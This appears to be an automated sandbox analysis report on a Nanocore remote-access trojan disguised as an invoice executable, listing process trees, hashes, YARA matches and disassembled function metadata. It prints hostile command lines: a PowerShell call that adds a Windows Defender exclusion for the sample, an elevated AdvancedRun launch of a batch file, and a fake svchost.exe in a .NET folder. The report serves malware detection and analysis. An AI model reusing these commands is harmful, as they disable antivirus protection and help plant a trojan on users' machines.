MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: AdvancedRun.exe PID: 5956 Parent PID: 7164

General

Start time:	09:14:14
Start date:	22/02/2021
Path:	C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Imagebase:	0x400000
File size:	91000 bytes
MD5 hash:	17FC12902F4769AF3A9271EB4E2DACCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Chronological Activities

Analysis Process: AdvancedRun.exe PID: 7092 Parent PID: 5956

General

Start time:	09:14:15
Start date:	22/02/2021
Path:	C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe' /SpecialRun 4101d8 5956
Imagebase:	0x400000
File size:	91000 bytes
MD5 hash:	17FC12902F4769AF3A9271EB4E2DACCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: svchost.exe PID: 4984 Parent PID: 568

General

Start time:	09:14:18
Start date:	22/02/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 4488 Parent PID: 7164

General

Start time:	09:14:22
Start date:	22/02/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force
Imagebase:	0xca0000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6580 Parent PID: 4488

General

Start time:	09:14:22
Start date:	22/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: explorer.exe PID: 6680 Parent PID: 3424

General

Start time:	09:14:23
Start date:	22/02/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe'
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6748 Parent PID: 7164

General

Start time:	09:14:22
Start date:	22/02/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c timeout 1
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6728 Parent PID: 6748

General

Start time:	09:14:23
Start date:	22/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: timeout.exe PID: 5992 Parent PID: 6748

General

Start time:	09:14:23
Start date:	22/02/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 1
Imagebase:	0xf00000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: explorer.exe PID: 5988 Parent PID: 800

General

Start time:	09:14:24
Start date:	22/02/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 1284 Parent PID: 5988

General

Start time:	09:14:28
Start date:	22/02/2021
Path:	C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe'
Imagebase:	0x440000
File size:	209408 bytes
MD5 hash:	379482795DA0042D0070E6AE599A369B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000002.954773732.0000000003D76000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.954773732.0000000003D76000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000016.00000002.954773732.0000000003D76000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 30%, ReversingLabs

Chronological Activities

Analysis Process: explorer.exe PID: 5320 Parent PID: 3424

General

Start time:	09:14:31
Start date:	22/02/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe'
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: explorer.exe PID: 5552 Parent PID: 800

General

Start time:	09:14:33
Start date:	22/02/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 3980 Parent PID: 5552

General

Start time:	09:14:35
Start date:	22/02/2021
Path:	C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe'
Imagebase:	0x860000
File size:	209408 bytes
MD5 hash:	379482795DA0042D0070E6AE599A369B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: CN-Invoice-XXXXX9808-19011143287989.exe PID: 7164 Parent PID: 5908 CN-Invoice-XXXXX9808-19011143287989.exeCOMMON

Executed Functions

Function 065E0040, Relevance: 36.3, Strings: 13, Instructions: 20001COMMON

Download Yara Rule

Strings

\wdi\C, xrefs: 065F3401, 065F32FD
F}k, xrefs: 065E0059
F}k, xrefs: 065EAAC2
F}k, xrefs: 065E3500
F}k, xrefs: 065FDF34
F}k, xrefs: 065E0739
sjyFRTTosnha ati tinrtnceirrE, xrefs: 065F3334
E.fsri\wdi\C, xrefs: 065F3428, 065F3318
sri\wdi\C, xrefs: 065E5574
ri\wdi\C, xrefs: 065E2645
csjyFRTTosnha ati tinrtnceirrE, xrefs: 065F3342
F}k, xrefs: 06600318
.fsri\wdi\C, xrefs: 065F3425, 065F3315

Memory Dump Source

Source File: 00000000.00000002.878186049.00000000065E0000.00000040.00000001.sdmp, Offset: 065E0000, based on PE: false

Similarity

API ID:
String ID: .fsri\wdi\C$E.fsri\wdi\C$F}k$F}k$F}k$F}k$F}k$F}k$\wdi\C$csjyFRTTosnha ati tinrtnceirrE$ri\wdi\C$sjyFRTTosnha ati tinrtnceirrE$sri\wdi\C
API String ID: 0-2396714462
Opcode ID: c80685d8f8e10e52b92d0f27e2d5ea51a2a6ff25504e06b143b874f443592f0a
Instruction ID: 89b18445f0fd312609d8b48b7f3437dd02ef438e687cf8594c944083a200269c
Opcode Fuzzy Hash: c80685d8f8e10e52b92d0f27e2d5ea51a2a6ff25504e06b143b874f443592f0a
Instruction Fuzzy Hash: F0B46C30E21224CEDBA4CF44C948A99B7F2BF05385F8690DAD4595F272D772DA88CF85

Uniqueness

Uniqueness Score: -1.00%

Function 06607350, Relevance: 5.0, Strings: 2, Instructions: 2504COMMON

Download Yara Rule

Strings

/"a.st}{ mnlFX/, xrefs: 0660A64E
.st}{ mnlFX/, xrefs: 0660A63D, 0660A651

Memory Dump Source

Source File: 00000000.00000002.878186049.00000000065E0000.00000040.00000001.sdmp, Offset: 065E0000, based on PE: false

Similarity

API ID:
String ID: .st}{ mnlFX/$/"a.st}{ mnlFX/
API String ID: 0-928898513
Opcode ID: 72817875d0afc0c1ed69135098f59d1c10bceb24e0c09e064bddc62780da556e
Instruction ID: 77551485915b99fe749f91f867db9ac478ba381d6cec0f6cb3b768df0e5fe03a
Opcode Fuzzy Hash: 72817875d0afc0c1ed69135098f59d1c10bceb24e0c09e064bddc62780da556e
Instruction Fuzzy Hash: CB235D54E3134048E77A8B49C298D6E2BB6EF453C8F1695ABC0541FB77E3B68188C74B

Uniqueness

Uniqueness Score: -1.00%

Function 0660DFF0, Relevance: 1.6, APIs: 1, Instructions: 50nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(?,?,?,?), ref: 0660E058

Memory Dump Source

Source File: 00000000.00000002.878186049.00000000065E0000.00000040.00000001.sdmp, Offset: 065E0000, based on PE: false

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 5a91043a253da6e2ecc97efbfae2d492aaca08873f9c8855acadbced2cbc727e
Instruction ID: b4ee9f04d6365d9dbf0813e45ee0a2774c8610e2e723c03811e9f020a0122062
Opcode Fuzzy Hash: 5a91043a253da6e2ecc97efbfae2d492aaca08873f9c8855acadbced2cbc727e
Instruction Fuzzy Hash: 691104B59002089FCB10DF9AC884BDFBBF4EB48324F148429E559A7250C775A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01082070, Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.812420168.0000000001080000.00000040.00000001.sdmp, Offset: 01080000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf780ff28641d3beb68a29a660b55b97f02f3c2b75710754a51aea8451133ad9
Instruction ID: 6fd8770ee37d15dd2b52bd2e3e06d3ac9317debfa30008267ca120a28d27a5fc
Opcode Fuzzy Hash: cf780ff28641d3beb68a29a660b55b97f02f3c2b75710754a51aea8451133ad9
Instruction Fuzzy Hash: 77718E353002409FD729AB31E959B3E3BA6FB89709B544439F906CB799DF3A9D02CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01082080, Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.812420168.0000000001080000.00000040.00000001.sdmp, Offset: 01080000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8082d44ae234ea70f64337c14088edd6429a8225089473197d377cb70754dd02
Instruction ID: f911f58b4bc670ff32505a5f3371c7727ce28d5f59958960a133886cfe6db530
Opcode Fuzzy Hash: 8082d44ae234ea70f64337c14088edd6429a8225089473197d377cb70754dd02
Instruction Fuzzy Hash: 25617F353003009FD728BB31E959B3E36A6FB89709B544439F9068B799DF3A9D02CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01083528, Relevance: 6.1, APIs: 4, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 01083598
GetCurrentThread.KERNEL32 ref: 010835D5
GetCurrentProcess.KERNEL32 ref: 01083612
GetCurrentThreadId.KERNEL32 ref: 0108366B

Memory Dump Source

Source File: 00000000.00000002.812420168.0000000001080000.00000040.00000001.sdmp, Offset: 01080000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 6b25da38f04e44c126c3b0a36f01266acba85f8362cf1523a68df0e2d6448b3b
Instruction ID: 57e6f92f045e8df5a5c98670751b99fa1a098a96afe71cf8ba6b98b3e455e390
Opcode Fuzzy Hash: 6b25da38f04e44c126c3b0a36f01266acba85f8362cf1523a68df0e2d6448b3b
Instruction Fuzzy Hash: DE5174B09006498FDB24DFA9C588BDEBBF0FF89318F20846AE589A7350D7749944CF65

Uniqueness

Uniqueness Score: -1.00%

Function 01083538, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 01083598
GetCurrentThread.KERNEL32 ref: 010835D5
GetCurrentProcess.KERNEL32 ref: 01083612
GetCurrentThreadId.KERNEL32 ref: 0108366B

Memory Dump Source

Source File: 00000000.00000002.812420168.0000000001080000.00000040.00000001.sdmp, Offset: 01080000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 3a1f119a30b505ee6b0079e921babd9643f325527660d1e50b114ff80aef666d
Instruction ID: c914ed3229293d761d26842e7c9cd089b62079f9d6b5128810fa60e4ac3daf9d
Opcode Fuzzy Hash: 3a1f119a30b505ee6b0079e921babd9643f325527660d1e50b114ff80aef666d
Instruction Fuzzy Hash: BB5173B09006498FDB14DFA9C588BDEBBF0FF89318F208469E589A7350C774A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0108C3C2, Relevance: 1.7, APIs: 1, Instructions: 199COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0108C616

Memory Dump Source

Source File: 00000000.00000002.812420168.0000000001080000.00000040.00000001.sdmp, Offset: 01080000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6b3af1d98ef08e1c89616c2c105305bf742af2a89b7f1f3fe69f54fc85af3e5b
Instruction ID: b88a7461b564ee9e44dc195aa9f7529f33e25a3d793b97c828fdccf5fea492f7
Opcode Fuzzy Hash: 6b3af1d98ef08e1c89616c2c105305bf742af2a89b7f1f3fe69f54fc85af3e5b
Instruction Fuzzy Hash: 03815570A04B058FE764EF29D1407AABBF1FF88204F00896ED586D7A40DB74E949CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0108E88C, Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0108E9AA

Memory Dump Source

Source File: 00000000.00000002.812420168.0000000001080000.00000040.00000001.sdmp, Offset: 01080000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 9d82d3ed74ad8aa67a76c93ed23e9c9667aa9c8f4e2a319f7c8cab0c3971f044
Instruction ID: 85fc2d457db0234fc8abf1e8b5090156c6cf6711ca060936ddd721bdb1397aec
Opcode Fuzzy Hash: 9d82d3ed74ad8aa67a76c93ed23e9c9667aa9c8f4e2a319f7c8cab0c3971f044
Instruction Fuzzy Hash: 7C51B0B1D00209DFDB14DF99C984ADEBBB5FF88310F24812AE959AB210D7B59845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0108E898, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0108E9AA

Memory Dump Source

Source File: 00000000.00000002.812420168.0000000001080000.00000040.00000001.sdmp, Offset: 01080000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 87da1abc1cf2862a1d17742843590090dfd85ea587c44913920d07fed04ae633
Instruction ID: e3a53020f05fc60428ee9cef94adc2107e6a49d580991a0e726c22911ce2a73a
Opcode Fuzzy Hash: 87da1abc1cf2862a1d17742843590090dfd85ea587c44913920d07fed04ae633
Instruction Fuzzy Hash: FE41C0B1D00309DFDB14DF99C884ADEBBF5BF88310F24812AE959AB210D7B59845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01083758, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010837E7

Memory Dump Source

Source File: 00000000.00000002.812420168.0000000001080000.00000040.00000001.sdmp, Offset: 01080000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 45aa634476f213270afc1507e2ffec4924afbc1a67a3c88098e3e305531347cf
Instruction ID: 7f65d20679053ffc1d6c98c9aa89967c642cc6d980e507d62dcf339345b132e0
Opcode Fuzzy Hash: 45aa634476f213270afc1507e2ffec4924afbc1a67a3c88098e3e305531347cf
Instruction Fuzzy Hash: 222103B59002089FDB10CFA9D584AEEBBF4FB48320F14841AE955A3310C378A955CF60

Uniqueness

Uniqueness Score: -1.00%

Function 01083760, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010837E7

Memory Dump Source

Source File: 00000000.00000002.812420168.0000000001080000.00000040.00000001.sdmp, Offset: 01080000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 984571d70c7e5238f02b077236368e2050b64c4a86f59dceaac58d4395339923
Instruction ID: bc9915d4ba5c8eecf8dc4fbfbce1c327e5cd6269d910e79322df7279c288432d
Opcode Fuzzy Hash: 984571d70c7e5238f02b077236368e2050b64c4a86f59dceaac58d4395339923
Instruction Fuzzy Hash: F321E4B59002099FDB10CF99D984ADEBBF4FB48320F14841AE954A7310D374A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0108B3F8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0108C691,00000800,00000000,00000000), ref: 0108C8A2

Memory Dump Source

Source File: 00000000.00000002.812420168.0000000001080000.00000040.00000001.sdmp, Offset: 01080000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 39359f2eca02ca3e36720d3e77b977554e72b04e30689f42eef23006a987bbe5
Instruction ID: 855892ec29d0a32d4b6cd5b67c75d63b23cbcff6f5daaa8d8ca522aaa7105663
Opcode Fuzzy Hash: 39359f2eca02ca3e36720d3e77b977554e72b04e30689f42eef23006a987bbe5
Instruction Fuzzy Hash: F81103B2904209DFDB10DFAAC544ADEFBF4EB88324F04842AE955A7600C3B5A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0108968A, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(0000004B), ref: 010896FD

Memory Dump Source

Source File: 00000000.00000002.812420168.0000000001080000.00000040.00000001.sdmp, Offset: 01080000, based on PE: false

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 03b5357c3b74731406248eed94dc8fd60ea66aa80695cf29006bba10dfb1aa68
Instruction ID: dff501e21f4e275ab896370290dbb88890ced0db83376a706366d6a3552abe06
Opcode Fuzzy Hash: 03b5357c3b74731406248eed94dc8fd60ea66aa80695cf29006bba10dfb1aa68
Instruction Fuzzy Hash: 4821CA718047888FCB21DFA9C4843EEBFF0EB06324F44849AD5C5A7242C3799605CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0108C831, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0108C691,00000800,00000000,00000000), ref: 0108C8A2

Memory Dump Source

Source File: 00000000.00000002.812420168.0000000001080000.00000040.00000001.sdmp, Offset: 01080000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3d601cefa41aedaa2461e0195d9ae750b1e560e65a2052270d6c5676f269ec2c
Instruction ID: 0f1b6f386c7533bc57a408332bff73952343f931e11e42167e4e2211ddb92c77
Opcode Fuzzy Hash: 3d601cefa41aedaa2461e0195d9ae750b1e560e65a2052270d6c5676f269ec2c
Instruction Fuzzy Hash: 4C1114B2C042498FDB10CFAAD584BEEFBF4EF88324F14842AD955A7600C375A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 010F22C2, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 010F2325

Memory Dump Source

Source File: 00000000.00000002.812991592.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 3a2b1af26545a328c4d9f4a8bf930d9bd338d930d7351ab21c686c2e970b22bb
Instruction ID: 7fec70e95f1c77c2c3693eca5506097be46525d7f8ffc9066bbdeedebc1c4614
Opcode Fuzzy Hash: 3a2b1af26545a328c4d9f4a8bf930d9bd338d930d7351ab21c686c2e970b22bb
Instruction Fuzzy Hash: 7D1103B58002499FDB10CF99D589BDEBBF4FB49324F108419E955A7600C3B5A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0108C5B0, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0108C616

Memory Dump Source

Source File: 00000000.00000002.812420168.0000000001080000.00000040.00000001.sdmp, Offset: 01080000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: ff708347bdc973432d61f7301b6db15c8d46c326166bc350732b1aa3776fd3a1
Instruction ID: d90855529bf494452483452483985dbf36f8323fe2a96df67832e0f68fc5016f
Opcode Fuzzy Hash: ff708347bdc973432d61f7301b6db15c8d46c326166bc350732b1aa3776fd3a1
Instruction Fuzzy Hash: CE1113B1C002498FDB10DF9AC544BDEFBF4EB89324F14842AD569B7600C374A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 010F22C8, Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 010F2325

Memory Dump Source

Source File: 00000000.00000002.812991592.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 00f0a5fe07551d2cf6917b43362908368f62c6266ae9749e8110ba6036f9d4f0
Instruction ID: 2f92475f20202f71ca88b429c4a6515b86189893e259f4d56d4ff604fc53e00e
Opcode Fuzzy Hash: 00f0a5fe07551d2cf6917b43362908368f62c6266ae9749e8110ba6036f9d4f0
Instruction Fuzzy Hash: 7611D0B58002499FDB20CF99D989BDEBBF8FB49324F14841AE955A7600C3B5A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0108CEC0, Relevance: .5, Instructions: 527COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.812420168.0000000001080000.00000040.00000001.sdmp, Offset: 01080000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6ab0923cab3073570e32d2ce67c2f6957cc696125f414d4f7bdf8dd491e2800
Instruction ID: 3e305519897aedd7d15c5d26446b858f8482c082da3fc34d33365f75daa07247
Opcode Fuzzy Hash: d6ab0923cab3073570e32d2ce67c2f6957cc696125f414d4f7bdf8dd491e2800
Instruction Fuzzy Hash: E25236B1610F068FD720CF54E8A82997BB1FB55328FD08208D5E15FAD9D3BA654ACF44

Uniqueness

Uniqueness Score: -1.00%

Function 0108B27C, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.812420168.0000000001080000.00000040.00000001.sdmp, Offset: 01080000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41e0dcef66c4a9c733244be4d6d2602ac99c2d93db301a1431b75f1bb4d5b894
Instruction ID: d633e1a4f6fffb1fd8b8ab567089c3b4f5e0a925bd345d65a420a1f9bec410dc
Opcode Fuzzy Hash: 41e0dcef66c4a9c733244be4d6d2602ac99c2d93db301a1431b75f1bb4d5b894
Instruction Fuzzy Hash: FEA16F32E0461ACFCF15EFA5D8445DEBBF2FF89300B15856AE985AB221DB31E915CB40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exe PID: 7088 Parent PID: 7164 powershell.exeCOMMON

Executed Functions

Function 034DF414, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.940919896.00000000034DD000.00000040.00000001.sdmp, Offset: 034DD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1f0d65c3fd9685cb18306237a9422c383ef071b5fa7baebd546019f4d7da8ad
Instruction ID: 7ca9c02e56d785edd87bbd78c77343e5d18c0df49ca95ae36e6e368237173f08
Opcode Fuzzy Hash: b1f0d65c3fd9685cb18306237a9422c383ef071b5fa7baebd546019f4d7da8ad
Instruction Fuzzy Hash: 5421F7B1508200EFCF15CF50D8D4B26BB65FB84318F24C5AAE90A4F256C336D85ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 034DF068, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.940919896.00000000034DD000.00000040.00000001.sdmp, Offset: 034DD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21ba650ecb1d66170a3958466f36fd3ad74090f3dcf57c2302dc2b5b5efc91f5
Instruction ID: 87e1f55bd4d4dbefc0202e5472398f6c7dd292001f7239ea2adc00efbf6a8788
Opcode Fuzzy Hash: 21ba650ecb1d66170a3958466f36fd3ad74090f3dcf57c2302dc2b5b5efc91f5
Instruction Fuzzy Hash: 4121DAB5504240DFDB25CF10D9D4B26BBA5FB44314F24C5AED90A4F346C376D84ACB65

Uniqueness

Uniqueness Score: -1.00%

Function 034DF40F, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.940919896.00000000034DD000.00000040.00000001.sdmp, Offset: 034DD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 532230db2b85fc92961555871aff52cdc7c4bb87d25654bbbb695598a4af2625
Instruction ID: 30625c0d7500571d7f538a45a64f52a6bfd42c555fe5aa76de13ae89dfacba10
Opcode Fuzzy Hash: 532230db2b85fc92961555871aff52cdc7c4bb87d25654bbbb695598a4af2625
Instruction Fuzzy Hash: 26218C75504280DFCB16CF50D9D4B16BF72FB88314F28C6AAD9094E65AC33AD46ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 034DF063, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.940919896.00000000034DD000.00000040.00000001.sdmp, Offset: 034DD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1c20cd08ac9bfdfef9880a5e3e3e9fd011adab4d8bd0dacb78f3dd37606542b
Instruction ID: 4f0d82d66b9d305dd956abc54a695e70c0e6c9089e96dedbb8dc21bc7311c4c0
Opcode Fuzzy Hash: e1c20cd08ac9bfdfef9880a5e3e3e9fd011adab4d8bd0dacb78f3dd37606542b
Instruction Fuzzy Hash: F9118B75504280DFCB21CF10D9D4B1ABBA1FB85314F28C6AAD84A4B756C33AD84ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 034DD005, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.940919896.00000000034DD000.00000040.00000001.sdmp, Offset: 034DD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 084c507dee2af916fac14a5cae05c04ff3b3141451ed03164a391e2435583af0
Instruction ID: 4950c10ac5ce7f461fa43b067d9b0de3bee81a3be3870cc5af1d377e608fe77f
